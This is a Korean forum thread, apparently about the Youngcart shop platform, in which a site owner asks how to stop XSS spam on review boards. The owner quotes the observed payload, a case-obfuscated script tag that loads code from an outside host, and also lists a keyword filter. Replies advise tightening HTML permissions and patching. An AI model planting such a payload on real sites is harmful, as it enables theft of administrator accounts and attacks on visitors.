해킹시도일까요? 차단할수있는방법 알수있을까요??
본문
저희 홈페이지 구매후기,Q&A게시판에
<sCRiPt sRC=//0x.ax/dflh></sCrIpT> 이런글이 요즘들어
자주 등록되는데 회원가입을 하긴하는데 대포폰인지 연결도되지않고
나이도 엄청많은사람 명의로 저런글 도배합니다
썼다가 바로지우고 그러던데 혹시 해킹시도인가요?
해결방법이있나요? html태그 못하게 막아라는글고 본것같은데
영카트자체적으로 어느정도 보안이 되어있나요?ㅠ
답변 2
HTML 쓰기 권한만 잘되어있으면
해당 스크립트는 무조건 텍스트로 출력되기때문에
상관없습니다.
중국발 xss 공격 시도입니다.
보통 관리자 계정 탈취가 목적인데
해당 공격은 단일패턴이 아니라서 영카트에서도
꾸준하게 취약점 업데이트가 이루어지고 있습니다.
우선 html 글쓰기 권한을 일반회원이 아닌 등급으로 올려주세요.
그것만해도 반은 막을수 있습니다.
그리고 영카트 보안패치는 가급적 올라오는대로 해주는게 좋습니다.
구매후기게시판 작성권한등급을 올리라는거에요?
그래버리면 일반회원도 후기작성을 못하지않나요?
현재HTML 쓰기권한은 관리자만 가능하게 10으로 설정되어있고
혹시몰라 단어필터링에도 sCRiPT,sRC,sCRiPt sRC,/sCrIpT,<,>,/,<,>
입력해뒀는데
게시판에 sCRiPT 입력하면 입력이안되는데 <sCRiPT 이런식으로 시작해버리면
<는 필터링이안되어 글이 등록되는데 <자체를 못쓰게할순없을까요
답변을 작성하시기 전에 로그인 해주세요.
